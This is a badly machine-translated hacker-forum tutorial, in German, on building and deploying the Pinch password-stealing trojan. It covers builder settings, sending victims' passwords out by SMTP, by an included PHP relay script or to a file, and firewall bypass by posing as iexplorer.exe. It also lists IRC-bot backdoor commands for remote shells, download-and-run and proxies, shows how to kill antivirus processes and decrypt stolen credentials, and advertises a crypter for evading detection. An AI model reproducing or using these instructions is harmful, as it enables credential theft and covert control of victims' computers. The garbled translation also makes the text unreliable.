This page has been robot translated, sorry for typos if any. Original content here.

Brechen Seife yuzaem BrutusAET2


Das Material wird zu Informationszwecken veröffentlicht. Der Autor übernimmt keine OTVETSVTENNOSTI


-------------------------------------------------- ----------------
Teil 1. alt, aber nützlich. für 1 Prise

***********************
1,0 Anweisung Pinch
***********************

=====
Intro
=====

Bitte seien Sie nicht überrascht sein, dass ich beschlossen, einen ähnlichen Artikel (Artikel für lamerzzz) zu schreiben. Tatsache ist, dass auf meinem Forum (http://forum.web-hack.ru) etwa einmal alle drei Tage, ein Thema wie geschaffen „Wie einzurichten und verwenden Pinch?“, „Wie Pinch`em zu benutzen?“ usw.

===========
Chancen
===========

Dieser Trojaner war ziemlich weit verbreitet in den Jahren 2003/2004. Alle mit der Fähigkeit, eine große Anzahl von Passwörtern (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat zu stehlen!, The Bat! 2, Outlook / Outlook Express, IE Autocomplete & geschützten Websites und FTP (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2K / XP unterstützt)), geringes Gewicht, leicht für eine bestimmte Aufgabe Quelle und die Schaffung von Troy zu öffnen. Trojan hat folgende Eigenschaften:

- Senden Sie die Computerkonfiguration des Opfers: Betriebssystem, operatika, CPU, Festplatte, angemeldeter Benutzer, den Hostnamen, IP
- Spy-Tastatur (Key-log)
- Remote Console (Remote-Konsole)
- Bypass Firewall`a
- Senden Passwort per E-Mail über SMTP-Server
- Verschlüsselung der gestohlenen Passwörter per Post geschickt
- Auto Löschen Trojan nach dem Start
- HTML / Text-Berichte
- Größe ca. 10 kb
- Modulares System
- Und vieles mehr...

Troyan Schreib coban2k (http://www.cobans.net) - ziemlich gut bekannte Person in der Welt ICQ-Hacking. Aufgrund von Problemen mit auf ihrem Server auf dem Trojan Store Hosting, wurde der Autor gezwungen, diese Kreatur von der eigenen Seite zu entfernen. Leider fast alle Antivirus diesen dreifachen finden und es kann nur vparit Opfer, die nicht wert, den Antivirus ist.

============
Optionen
============

Archiv (pinch_1.0.zip) mit Trojaner enthält folgende Ordner und Dateien:

PinchBuilder.exe \ - Assistenten einen Trojaner erstellen
\ Parser.exe - Programm zu verschlüsselte Nachrichten mit Passwörtern zu entschlüsseln
\ Readme.txt - kein Kommentar
\ Pinch \ - der Hauptordner mit asm-Source-Compiler und Trojan
\ Sources \ - die andere Quelle
\ TB 2 Plugin (Auto-Parser) \ -! Ordner mit Plug-in für The Bat 2, die die verschlüsselte E-Mail mit Passwörter entschlüsselt, die an Ihre Mailbox kommen
\ Sources \ Script \ - PHP-Skript, das durch ein Passwort gesendet wird, wenn die entsprechende Option bei der Kompilierung der Auswahl (mehr lesen)

================
kompilieren Troy
================

Das Set kommt mit einem speziellen Master (PinchBuilder.exe), die an der Erstellung des Trojaners auf Ihren Anforderungen und die Erstellung des Trojan direkt auf Ihrem Computer eingreifen. Das Programm hat zwei Haupt-Tabs: Compilieren und Entschlüsseln. Die erste ist ein Trojanisches Pferd zu erstellen, und die anderen Passwörter zu entschlüsseln (in der Tat, dieses Fenster ist das Ergebnis der Arbeit Parser.exe-Datei). Des Weiteren gibt es drei Unterregister: SMTP, HTTP und FILE. Sie sind Variante O Passwörter gegeben. Wir prüfen jedes Detail:

========
SMTP
========

Im Feld Server geben Sie die Adresse (Hostnamen / IP) SMTP-Server. Wenn Sie die Domäne des Servers eingeben, dann die Resolve klicken, dass die Domäne des Servers in Form von IP-Adressen hat. Ferner wird in dem Aus und die Seife hinweisen. Sende Test Massage-Taste zum Testen eines Brief durch die Einstellungen Senden Sie angeben. Es wird dringend empfohlen, es zu benutzen. Wenn der Brief nicht kommt, bedeutet es, dass es einige Probleme mit dem Senden (inklusive Firewall, schlechten SMTP, drücken Sie nicht auf den Resolve, etc.).

Ich nehme zur Kenntnis, dass vor kurzem die Mehrheit der Anbieter ein System bewegen, auf denen ihre Kunden Briefe nur mit ihren SMTP-Verver senden können. In solchen Fällen empfiehlt es sich, ein Verfahren zum Senden von Nachrichten über HTTP zu verwenden.

====
HTTP
====

Hochladen von Dateien \ Sources \ Script \ view.php der Server unterstützt PHP-Skripten und Ausführen der Funktion mail (). Ferner wird das URL-Feld den Pfad zu diesem Skript angeben (z.B. http://www.xss.ru/pinch.php). Im Betreff-Feld geben Sie den Namen des Themas, das den Brief wieder erholen wird. Check str String sollte im Feld Status sein, die durch das Skript ausgegeben wird, nachdem es heruntergeladen wird. Das Skript ist mit Troy gebündelt es ankommt: _ret_ok_1:

<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>

Wenn dieser Wert nicht akzeptiert Trojaner ist, wird sie versuchen, jede Minute einen Brief durch dieses Skript zu senden, bis es eine Antwort auf eine Zeichenfolge der Kontroll str Feld Status erhält. Ich empfehle Ihnen, ein Skript zu verwenden, ist nicht Teil der Norm, und ich schrieb:

<Html> <body>
<? Php
// Autor: Terabyte (http://www.web-hack.ru)
$ E-Mail = $ _ POST [ 'a'];
$ Subject = $ _ POST [ 'b'];
$ Msg = $ _ POST [ 'c'];
if (isset ($ E-Mail) und isset ($ subject) und isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

Er macht fast die gleiche Sache, aber intelligent geschrieben. Der große Vorteil der Verwendung dieser Methode ist es, das Senden von Passwörtern, die Tatsache, dass es Ihnen erlaubt, Passwörter zu senden Firewall`a zu umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Protokoll outpost`a zum Zeitpunkt des Passworts über ein Skript von meiner Seite zu senden:

Prozessname: iexplorer.exe
Protokolle: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder verstanden, die nicht in dem Tank ist =) Nur den Vorteils Ich kann, ich die Möglichkeit bieten kann, um verschlüsselte E-Mails auf Ihrer Website aufnehmen, anstatt die Seife zu senden; Fähigkeit, die Seife zu ändern, die Passwörter für den Fall, sendet sie gelöscht wurde; wenn Massen Troy Mailing (das Passwort selbst zu diesen Service-Provider werden können, wo behinderter Zugriff auf all SMTP-Server gesendet, aber sie es)

====
FILE
====

Auf dieser Registerkarte geben Sie den Pfad zu der Datei in dem Sie alle Passwörter gespeichert. Um dies zu tun im Feld Pfad, müssen wir den Pfad zur Datei schreiben (zum Beispiel C: \ password.txt).

================
-Compileroptionen
================

In diesem Bereich ist alles klar, dann setzen Sie müssen nur ein Häkchen in den Bereichen, wo Sie es brauchen. Es ist erwähnenswert, Icon Feld hinzufügen. Es zeigt den Weg auf das Symbol, das die kompilierte Trojaner angezeigt. Ich nehme zur Kenntnis, dass auf meinem System (Windows XP) Ich habe nicht in der Lage gewesen, Troy zu kompilieren diese Option aktiviert ist, und es mußte abgeschaltet werden.

Das Protokoll-Feld zeigt die Methode gesendet Passwörter (SMTP / HTTP / FILE) werden. Als nächstes klicken Sie auf die Schaltfläche Kompilieren zu kompilieren und soll Trojan, die im Hauptordner mit dem Assistenten, es schaffen gespeichert wird.

===================
Entschlüsseln Passwörter
===================

Angenommen, Sie haben die vparit lamer verdreifachen verwaltet und Sie kamen zu den Soap-Passwörter auf dem infizierten Computer. Tatsache ist, dass beim Senden Passwörter werden verschlüsselt und können starten entschlüsselt werden (wenn Sie nicht ein spezielles Plug-in für TheBat installiert haben! Oben beschrieben). Kopieren von Text in die Zwischenablage mit verschlüsselten Passwörtern, offene Parser.exe (oder Tab PinchBuilder.exe Entschlüsseln) und klicken Sie im Kontextmenü Prozessdaten Punk (oder drücken Sie einfach die Tastenkombination Alt + C). Als nächstes wird das Programm Ihnen alle von dem Opfer mit einer bequemen Art und Weise gestohlene Daten. Dann können Sie sie speichern oder drucken.

==========
Abschluss
==========

Ich möchte Sie warnen, dass die Verwendung dieses Trojan Sie sofort nach Artikel 273 des Strafgesetzbuches fallen und streng bestraft werden kann ;-) Ich (der Autor) tragen keine Verantwortung für Schäden, die für jede Person verursacht werden oder, nach meinem Artikel lesen.


----------------------------------------

Teil 2. Die Anweisungen für die Pinch 2,58

Ein kleiner kleiner Artikel auf elementare Konfiguration der Quetschung. Richtet nicht streng, sondern kritisiert seinen vollen Mund. Artikel auf Einstellung Pinch 2,58.

Ich denke, dass mit dem Riss-om keine Probleme niukavo da es detaillierte Hilfe und sogar ein Video beigefügt. Ich möchte zeigen, wie Bildere Troy zu konfigurieren:

SMTP-Eigenschaften
Server (Eingabe, in Ihrem Fall smtp.mail.ru), dann sicher sein, Resolve zu drücken, dass es in eine IP-transformiert (übrigens. Alle Manipulationen müssen, wenn mit dem Internet verbunden werden durch)

Port - lassen wie es ist,

Protokoll - die Wahl, wie sie einen Bericht über die SMTP entpuppen wird, HTTP (via PHP) und FILE - auf Ihrem Computer gespeichert. Buttons mit dem gleichen Namen (SMTP, HTTP, FILE) Einstellung Protokolle, aber wir sind interessiert in diesem Fall SMTP, und wir haben bereits eingerichtet ..

TestSend Schaltfläche , um eine Test - Nachricht in der E - Mail zu senden.

Tab PWD - pret Passwörter der folgenden Programme. Ermöglichungs PWD beim Entfernen Dohle Berichte werden keine Passwörter enthalten.
Galka Sie senden alten Bericht nicht - nicht die alten Berichte senden.
Dohlen Verschlüsseln und Verpackung miteinander in Beziehung. FSG, UPX, MEW Bereich des Verpackungsprozesses.

Tab RUN - Auswahl der Startmethoden. Ich denke, es wird beschäftigen in. Zapuchkat wie .... standart, DLL, Undelate Dienst. In Ordner verschieben ..... oder sich Punkte oder wählen Sie bitte eine der Anlage. Rechts Spalte Werte Ich habe ihn nicht berühren und ehrlich vage zu sein, sich vorstellen, was es ist. Unten rechts - Bypass Windows-Firewall (SP2) - umgeht den System-Firewall in SP2 (soweit ich den Mechanismus dieser Stelle wissen - er begann als iexplorer.exe)

Tab die SPY - was die zusätzlichen Berichte - ich habe es nicht funktionieren. Fad Bildschirm Spion - einen Screenshot, aber dann wieder habe ich es nicht funktioniert (srkin sendet, aber es war leer)

Tab NET - ich habe es nicht verwenden. Es wurde entwickelt, um:
1. einen Port auf dem infizierten Computer öffnen, und damit Zugang zu erhalten (stark es Nesovetuyu zu verwenden, wenn nicht zashifrueshsya wenn man erwischt wird, dann kann er erraten, was kommt ...)
2. Downloader - ein direkter Link zu einer Datei, die heruntergeladen und ausgeführt werden (zählen, welche Kosten Feind zu tragen, wenn er Verkehr hat ......))))
3. Autoupdate - Auto-Update - Troy, nach Abschluss, eine Kopie von sich selbst herunterlädt und dann löscht sich selbst und den nächsten Systemstart startet eine neue Kopie haben (was für eine höhere Zuverlässigkeit, die er nicht gefunden worden war ..

Tab BD (backdoor) - Konsolenschale öffnet das ausgewählte Port - Management über Telnet (telnet.exe) oder alternative prog. (Ich habe nicht versucht)

Tab ECT - egal mit welcher Datei Kleben, sowie die Installation von Icons ... Das können Sie eine Nachricht auftauchen würde ... Aber etwas nicht funktioniert ...

Tab KILL - Kill kokogo einen Prozess (Sie können versuchen und töten , anti-Virus), wie „spidernt“ - und dann heruntergefahren und DrWEB-Monitor (Ich warne Sie, ich habe noch nicht gegeben, aber ich werde versuchen)

Tab IE - auf ihre Browser - Startseite installiert. Seite zu Favoriten hinzufügen ....

Tab WORM - sho tse Takeo, ich veduyu nicht ... .....

IRC-Bot Tab - Zugriff auf einen Computer über IRC:
.login Zulassung
.die - Fertigstellung des Bot
.download - Dateisprung mit Schrägstrichen
.httpd - offen Zugriff auf die Datei über HTTP an einen bestimmten Port
.killthread - der Abschluss einer bestimmten Aufgabe
.proxy - Öffnung soks4 mit dem ausgewählten Anschluss mit der ausgewählten id
.RAW - Senden Rohtext auf dem IRC-Server
.remove - samoudalenie
.restart - Restart
.run - Befehle ausführen
.Scan - IP-Adressen auf der Prüfung bestimmte offene Ports
.shell - Öffnen der Schale an einem bestimmten Port (nicht 95/98 / ME)
.status - Show-Version, IP, Datum der Markteinführung
.threads - zeigen aktive Aufgaben
.update - Selbsterneuerung des Bots mit spezifischen Urla
.Besuch - besuchen Sie die ausgewählte URL versteckt
.url - besuchen Sie die ausgewählte URL geöffnet
.link - Lesezeichen hinzufügen
.sp - Machen Sie Ihre Homepage
msg - Nachricht (messagebox)

Das scheint alles zu sein .... Sie drücken KOMPILIEREN und Sie haben den Ordner mit dem Builder erscheint triple ...

VIEL GLÜCK !!!!!

Diese PS ist, wie, alles für Informationen geschrieben und der Autor ist nicht verantwortlich für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Merkmale der Krypta:
Gebrauchte polimorny kriptor
Bypass KIS und Outpost (einschließlich der neuesten Version)
Samoudalenie
Die Reduzierung der Größe (Normal Prise von 3-6kb reduziert wird, Lader zupacha auf 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~